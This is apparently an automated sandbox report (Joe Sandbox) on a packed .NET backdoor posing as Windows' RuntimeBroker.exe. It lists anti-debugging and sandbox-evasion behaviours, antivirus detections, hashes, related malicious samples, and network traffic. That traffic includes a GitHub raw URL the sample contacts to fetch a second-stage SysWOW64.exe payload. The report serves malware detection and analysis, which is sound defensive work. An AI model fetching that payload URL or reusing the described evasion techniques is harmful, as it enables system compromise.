Source: C:\Users\user\Desktop\RuntimeBroker.exeCode function: 0_2_0584EF80 CheckRemoteDebuggerPresent,0_2_0584EF80
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeQueries volume information: C:\Users\user\Desktop\RuntimeBroker.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
Windows Management Instrumentation
1
DLL Side-Loading
1
DLL Side-Loading
1
Disable or Modify Tools
OS Credential Dumping321
Security Software Discovery
Remote Services1
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts151
Virtualization/Sandbox Evasion
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Obfuscated Files or Information
Security Account Manager151
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
Software Packing
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Timestomp
LSA Secrets22
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
RuntimeBroker.exe39%ReversingLabsWin32.Trojan.Generic
RuntimeBroker.exe100%AviraBDS/Backdoor.Gen
SAMPLE100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://raw.githubusercontent.comd0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
ax-9999.ax-msedge.net
150.171.28.254
truefalse
    high
    github.com
    140.82.114.4
    truefalse
      high
      raw.githubusercontent.com
      185.199.108.133
      truefalse
        high
        c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com
        unknown
        unknownfalse
          high
          35.56.3.0.in-addr.arpa
          unknown
          unknownfalse
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://github.com/cyendd-sigma/notmine/raw/refs/heads/main/SysWOW64.exefalse
              high
              NameSourceMaliciousAntivirus DetectionReputation
              https://raw.githubusercontent.com/cyendd-sigma/notmine/refs/heads/main/SysWOW64.exeRuntimeBroker.exe, 00000000.00000002.1549193132.000000000339E000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://raw.githubusercontent.comRuntimeBroker.exe, 00000000.00000002.1549193132.000000000339E000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://raw.githubusercontent.comdRuntimeBroker.exe, 00000000.00000002.1549193132.0000000003648000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://github.comRuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://raw.githubusercontent.comRuntimeBroker.exe, 00000000.00000002.1549193132.0000000003648000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        140.82.114.4
                        github.comUnited States
                        36459GITHUBUSfalse
                        185.199.108.133
                        raw.githubusercontent.comNetherlands
                        54113FASTLYUSfalse
                        Joe Sandbox version:42.0.0 Malachite
                        Analysis ID:1651706
                        Start date and time:2025-03-29 13:59:20 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 3m 10s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:1
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:RuntimeBroker.exe
                        Detection:MAL
                        Classification:mal92.evad.winEXE@1/0@4/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 26
                        • Number of non-executed functions: 1
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated
                        • Excluded IPs from analysis (whitelisted): 23.96.180.189, 20.12.23.50, 20.3.187.198, 150.171.28.254, 2.23.227.208
                        • Excluded domains from analysis (whitelisted): www.bing.com, ax-ring.msedge.net, fe3.delivery.mp.microsoft.com, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, arc.trafficmanager.net, iris-de-prod-azsc-v2-ncus.northcentralus.cloudapp.azure.com, arc.msn.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        TimeTypeDescription
                        09:00:36API Interceptor15x Sleep call for process: RuntimeBroker.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        140.82.114.4Revised - College of the canyons 2025 Handbook80114.docGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                          https://publuu.com/flip-book/830106/1826131Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                            https://publuu.com/flip-book/830106/1826131Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                              https://fairwaymarket.cloud/TWFyay5SdWRlQEhzY3BvbHkuQ29t##Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                Nationalmi_receipt0291.svgGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                  https://digstudio.sharefile.com/public/share/web-sf9877201d645406b84b8dca7035ef0a9Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                    Revised - Hartzellprop.com 2025 Handbook29828.docGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                      suspectTelling clean needful (78.2 KB).msgGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                        https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                          h2H2R15NDO.exeGet hashmaliciousLummaC StealerBrowse
                                            185.199.108.133cr_asm.ps1Get hashmaliciousUnknownBrowse
                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                            vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                            VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                            gaber.ps1Get hashmaliciousUnknownBrowse
                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                            cr_asm.ps1Get hashmaliciousUnknownBrowse
                                            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            ax-9999.ax-msedge.net7NOT92-GmT6-1OjO9-R14.msiGet hashmaliciousUnknownBrowse
                                            • 150.171.27.254
                                            https://eu-central-1.protection.sophos.com/?d=klclick3.com&u=aHR0cHM6Ly9jdHJrLmtsY2xpY2szLmNvbS9sLzAxSlE2TldIMFdaVkdNV0tBODFNQkZGN1JUXzI=&p=m&i=NjcwOGRlNTQxNWVkNDAyNmUyZjA5MzFh&t=VUNaZ1Yza2szQkUxQ2V5U3gwNDYvRXh1ZWpOb1orVWYwMkVMRzFlQmtmMD0=&h=696c0b13c9bb46b2b210e89a34578cd9&s=AVNPUEhUT0NFTkNSWVBUSVbYlGfZU66j8K_UDSuTsyS5h7hisQMzbX-xxgbWnDCCvgGet hashmaliciousHTMLPhisherBrowse
                                            • 150.171.27.254
                                            3Judiciario02-jRc3-8Gwc1-T12.msiGet hashmaliciousUnknownBrowse
                                            • 150.171.27.254
                                            6FUm1OkfM3.exeGet hashmaliciousCryptOneBrowse
                                            • 150.171.27.254
                                            RXFXJSCBCP.exeGet hashmaliciousCryptOneBrowse
                                            • 150.171.27.254
                                            random.exe2.exeGet hashmaliciousHealer AV DisablerBrowse
                                            • 150.171.27.254
                                            AG5SpY2I0y.exeGet hashmaliciousXWormBrowse
                                            • 150.171.27.254
                                            UeiROaQBew.exeGet hashmaliciousUnknownBrowse
                                            • 150.171.28.254
                                            http://fliqlo.appGet hashmaliciousUnknownBrowse
                                            • 150.171.27.254
                                            Df2V52Gob5.exeGet hashmaliciousRusty StealerBrowse
                                            • 150.171.27.254
                                            raw.githubusercontent.comclimb.exeGet hashmaliciousLummaC StealerBrowse
                                            • 185.199.110.133
                                            x-ray-health-record.batGet hashmaliciousBraodoBrowse
                                            • 185.199.108.133
                                            xxrkjufx.exeGet hashmaliciousNeptuneRATBrowse
                                            • 185.199.111.133
                                            Logger.exeGet hashmaliciousUnknownBrowse
                                            • 185.199.111.133
                                            MasonClient.exeGet hashmaliciousNeptuneRATBrowse
                                            • 185.199.111.133
                                            SecuriteInfo.com.Trojan.GenericKD.76058097.12003.12326.exeGet hashmaliciousUnknownBrowse
                                            • 185.199.110.133
                                            SecuriteInfo.com.Trojan.GenericKD.76058097.12003.12326.exeGet hashmaliciousUnknownBrowse
                                            • 185.199.108.133
                                            u1.ps1Get hashmaliciousUnknownBrowse
                                            • 185.199.110.133
                                            S0FTWARE.exeGet hashmaliciousVidarBrowse
                                            • 185.199.111.133
                                            x96lib.exeGet hashmaliciousNeptuneRATBrowse
                                            • 185.199.111.133
                                            github.comclimb.exeGet hashmaliciousLummaC StealerBrowse
                                            • 140.82.112.3
                                            t3333-03-2825.batGet hashmaliciousBraodoBrowse
                                            • 140.82.112.3
                                            x-ray-health-record.batGet hashmaliciousBraodoBrowse
                                            • 140.82.114.3
                                            https://jv.wijaxbosjm.es/nwbGgL/Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                            • 140.82.114.3
                                            Revised - College of the canyons 2025 Handbook80114.docGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                            • 140.82.114.4
                                            xxrkjufx.exeGet hashmaliciousNeptuneRATBrowse
                                            • 140.82.113.3
                                            Logger.exeGet hashmaliciousUnknownBrowse
                                            • 140.82.113.3
                                            MasonClient.exeGet hashmaliciousNeptuneRATBrowse
                                            • 140.82.113.3
                                            https://L1h.toliviraxen.ru/MzobBPAf/Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                            • 140.82.114.3
                                            https://publuu.com/flip-book/830106/1826131Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                            • 140.82.114.4
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            GITHUBUSclimb.exeGet hashmaliciousLummaC StealerBrowse
                                            • 140.82.112.3
                                            t3333-03-2825.batGet hashmaliciousBraodoBrowse
                                            • 140.82.112.3
                                            x-ray-health-record.batGet hashmaliciousBraodoBrowse
                                            • 140.82.114.3
                                            https://jv.wijaxbosjm.es/nwbGgL/Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                            • 140.82.114.3
                                            Revised - College of the canyons 2025 Handbook80114.docGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                            • 140.82.114.4
                                            xxrkjufx.exeGet hashmaliciousNeptuneRATBrowse
                                            • 140.82.113.3
                                            Logger.exeGet hashmaliciousUnknownBrowse
                                            • 140.82.113.3
                                            MasonClient.exeGet hashmaliciousNeptuneRATBrowse
                                            • 140.82.113.3
                                            https://L1h.toliviraxen.ru/MzobBPAf/Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                            • 140.82.114.3
                                            https://publuu.com/flip-book/830106/1826131Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                            • 140.82.114.4
                                            FASTLYUSmaksrat.jarGet hashmaliciousUnknownBrowse
                                            • 199.232.88.209
                                            climb.exeGet hashmaliciousLummaC StealerBrowse
                                            • 185.199.110.133
                                            7ivgZ6j7.pdfGet hashmaliciousUnknownBrowse
                                            • 199.232.90.172
                                            https://saonacollection.com/Core/-/userid/chudyGet hashmaliciousUnknownBrowse
                                            • 151.101.194.132
                                            https://saonacollection.com/Core/-/userid/chudyGet hashmaliciousUnknownBrowse
                                            • 151.101.66.132
                                            arm6.elfGet hashmaliciousUnknownBrowse
                                            • 199.232.90.49
                                            x-ray-health-record.batGet hashmaliciousBraodoBrowse
                                            • 185.199.108.133
                                            https://jv.wijaxbosjm.es/nwbGgL/Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                            • 151.101.194.137
                                            Hess Vioce Message.pdfGet hashmaliciousUnknownBrowse
                                            • 23.185.0.1
                                            https://beekbyanna.formstack.com/forms/infoGet hashmaliciousHTMLPhisherBrowse
                                            • 199.232.88.157
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            3b5074b1b5d032e5620f69f9f700ff0eclimb.exeGet hashmaliciousLummaC StealerBrowse
                                            • 140.82.114.4
                                            t3333-03-2825.batGet hashmaliciousBraodoBrowse
                                            • 140.82.114.4
                                            66GPrIRLfp.exeGet hashmaliciousDiscord Token StealerBrowse
                                            • 140.82.114.4
                                            x-ray-health-record.batGet hashmaliciousBraodoBrowse
                                            • 140.82.114.4
                                            xxrkjufx.exeGet hashmaliciousNeptuneRATBrowse
                                            • 140.82.114.4
                                            XCsslient.exeGet hashmaliciousXWormBrowse
                                            • 140.82.114.4
                                            SPChaotic.exeGet hashmaliciousXWormBrowse
                                            • 140.82.114.4
                                            SysRuntime.exeGet hashmaliciousXWormBrowse
                                            • 140.82.114.4
                                            SystemRuntime.exeGet hashmaliciousXWormBrowse
                                            • 140.82.114.4
                                            MasonClient.exeGet hashmaliciousNeptuneRATBrowse
                                            • 140.82.114.4
                                            No context
                                            No created / dropped files found
                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):6.407669504084401
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:RuntimeBroker.exe
                                            File size:79'392 bytes
                                            MD5:61fd0424631fc50f17989c516950935e
                                            SHA1:8b616f88f47a9aa473512a91a8b3b39a7949aff7
                                            SHA256:c829147f0697e5a7c72e6aaac0b092b4d2a5e3d6a0132d540c49d2ea432877b9
                                            SHA512:e0bc65029e6fe0e7b4bf12d7ef5b3e64dbd926778c7e6df6c1c72ab754c36eeba7a837d8a611510aa729fce648aa01af8c1f0d3aebcfc89978718c22e3f3ffff
                                            SSDEEP:1536:Yzp+nkIgYxM+hTjAo1RGBbrd9BPJXyyRTB:aZT9+NsuRebrhPJj/
                                            TLSH:6873B301F4415601E498357AC1E6A8B8137DA5FBE263814A6FF223D7CBE35D21E47A8F
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,............."...0......$...........@... ....@.. ....................... ............`................................
                                            Icon Hash:90cececece8e8eb0
                                            Entrypoint:0x41a00a
                                            Entrypoint Section:UPX
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0xA6EAA72C [Fri Sep 27 23:47:56 2058 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                            Instruction
                                            jmp dword ptr [0041A000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xab3c0x4f
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x5de
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x200000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x1a0000x8UPX
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x40000x48
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            w70x20000xaa40xc00e78a8b487ff2cb0f91bc58ada7786c16False1.0035807291666667data7.939048109812574IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            0x40000x10a740x10c0050fe44d0824f34b42a70297a79b85769False0.4703533115671642data6.447239384693461IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            0x160000x5de0x6006df8f39be90781d07b101c31e07590eaFalse0.42578125data4.162010888053922IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .Enigma0x180000xa0x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            UPX0x1a0000x100x200a8be9c99d1e250a82a199e42ed72ef0aFalse0.04296875data0.12227588125913882IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            zjifahsi0x1c0000xb810xc009d982ae05f0799aa9dcb630b1c990a28False0.24674479166666666data5.361450215834434IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .UPX0x1e0000x8b0x200c391ba0c64258e9d98fe84a6864df69bFalse0.0390625data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x200000xc0x200aff5b30ceb43f61f913db3abeba94533False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_VERSION0x160a00x354data0.4166666666666667
                                            RT_MANIFEST0x163f40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                            DLLImport
                                            mscoree.dll_CorExeMain
                                            DescriptionData
                                            Translation0x0000 0x04b0
                                            CommentsRuntimeBroker
                                            CompanyNameMicrosoft Inc.
                                            FileDescriptionRuntimeBroker
                                            FileVersion1.0.0.0
                                            InternalNameRuntimeBroker.exe
                                            LegalCopyrightCopyright 2015
                                            LegalTrademarks
                                            OriginalFilenameRuntimeBroker.exe
                                            ProductName
                                            ProductVersion1.0.0.0
                                            Assembly Version1.0.0.0

                                            Download Network PCAP: filteredfull

                                            • Total Packets: 18
                                            • 443 (HTTPS)
                                            • 53 (DNS)
                                            TimestampSource PortDest PortSource IPDest IP
                                            Mar 29, 2025 14:00:36.612060070 CET49712443192.168.2.5140.82.114.4
                                            Mar 29, 2025 14:00:36.612101078 CET44349712140.82.114.4192.168.2.5
                                            Mar 29, 2025 14:00:36.612175941 CET49712443192.168.2.5140.82.114.4
                                            Mar 29, 2025 14:00:36.632260084 CET49712443192.168.2.5140.82.114.4
                                            Mar 29, 2025 14:00:36.632280111 CET44349712140.82.114.4192.168.2.5
                                            Mar 29, 2025 14:00:36.874435902 CET44349712140.82.114.4192.168.2.5
                                            Mar 29, 2025 14:00:36.874514103 CET49712443192.168.2.5140.82.114.4
                                            Mar 29, 2025 14:00:36.878875017 CET49712443192.168.2.5140.82.114.4
                                            Mar 29, 2025 14:00:36.878889084 CET44349712140.82.114.4192.168.2.5
                                            Mar 29, 2025 14:00:36.879178047 CET44349712140.82.114.4192.168.2.5
                                            Mar 29, 2025 14:00:36.929311037 CET49712443192.168.2.5140.82.114.4
                                            Mar 29, 2025 14:00:36.951514006 CET49712443192.168.2.5140.82.114.4
                                            Mar 29, 2025 14:00:36.992285967 CET44349712140.82.114.4192.168.2.5
                                            Mar 29, 2025 14:00:37.204689980 CET44349712140.82.114.4192.168.2.5
                                            Mar 29, 2025 14:00:37.204783916 CET44349712140.82.114.4192.168.2.5
                                            Mar 29, 2025 14:00:37.204853058 CET44349712140.82.114.4192.168.2.5
                                            Mar 29, 2025 14:00:37.206286907 CET49712443192.168.2.5140.82.114.4
                                            Mar 29, 2025 14:00:37.206729889 CET49712443192.168.2.5140.82.114.4
                                            Mar 29, 2025 14:00:37.210618019 CET49712443192.168.2.5140.82.114.4
                                            Mar 29, 2025 14:00:37.305083990 CET49713443192.168.2.5185.199.108.133
                                            Mar 29, 2025 14:00:37.305114985 CET44349713185.199.108.133192.168.2.5
                                            Mar 29, 2025 14:00:37.305223942 CET49713443192.168.2.5185.199.108.133
                                            Mar 29, 2025 14:00:37.305546999 CET49713443192.168.2.5185.199.108.133
                                            Mar 29, 2025 14:00:37.305557013 CET44349713185.199.108.133192.168.2.5
                                            Mar 29, 2025 14:00:39.954952955 CET49713443192.168.2.5185.199.108.133
                                            TimestampSource PortDest PortSource IPDest IP
                                            Mar 29, 2025 14:00:36.498598099 CET5253053192.168.2.51.1.1.1
                                            Mar 29, 2025 14:00:36.598462105 CET53525301.1.1.1192.168.2.5
                                            Mar 29, 2025 14:00:37.214771986 CET5751553192.168.2.51.1.1.1
                                            Mar 29, 2025 14:00:37.304069042 CET53575151.1.1.1192.168.2.5
                                            Mar 29, 2025 14:00:38.923979998 CET6547053192.168.2.51.1.1.1
                                            Mar 29, 2025 14:00:39.026340961 CET53654701.1.1.1192.168.2.5
                                            Mar 29, 2025 14:00:44.655904055 CET5500853192.168.2.51.1.1.1
                                            Mar 29, 2025 14:00:44.754340887 CET53550081.1.1.1192.168.2.5
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Mar 29, 2025 14:00:36.498598099 CET192.168.2.51.1.1.10xf5c7Standard query (0)github.comA (IP address)IN (0x0001)false
                                            Mar 29, 2025 14:00:37.214771986 CET192.168.2.51.1.1.10x1185Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                            Mar 29, 2025 14:00:38.923979998 CET192.168.2.51.1.1.10x99d9Standard query (0)35.56.3.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                            Mar 29, 2025 14:00:44.655904055 CET192.168.2.51.1.1.10x7badStandard query (0)c2a9c95e369881c67228a6591cac2686.clo.footprintdns.comA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Mar 29, 2025 14:00:36.598462105 CET1.1.1.1192.168.2.50xf5c7No error (0)github.com140.82.114.4A (IP address)IN (0x0001)false
                                            Mar 29, 2025 14:00:37.304069042 CET1.1.1.1192.168.2.50x1185No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
